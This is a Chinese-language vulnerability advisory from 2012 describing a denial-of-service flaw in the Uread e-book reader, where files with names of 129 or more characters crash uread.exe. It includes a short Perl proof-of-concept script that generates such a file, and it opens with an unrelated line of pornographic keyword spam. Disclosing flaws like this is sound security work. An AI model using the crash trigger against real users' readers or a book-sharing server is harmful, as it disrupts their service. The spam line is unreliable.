欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Uread閱讀器拒絕服務(wù)漏洞的分析與解決

  發(fā)布時間:2012-07-04 14:35:54   作者:佚名   我要評論
Uread閱讀器在遠程或本地打開文件名過長(大于或等于129個字符)的upub等文件時將引起uread.exe程序無法正常工作,必須重新啟動uread.exe進程方可。
Uread閱讀器在遠程或本地打開文件名過長(大于或等于129個字符)的upub等文件時將引起uread.exe程序無法正常工作,必須重新啟動uread.exe進程方可。
遠程攻擊者可考慮將過長文件名的文件上傳至“至善讀書”的服務(wù)器端,實現(xiàn)遠程拒絕服務(wù)攻擊。
測試證明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修復(fù)方案:
目前廠商還沒有提供補丁或者升級程序。
作者 demonalex

相關(guān)文章

最新評論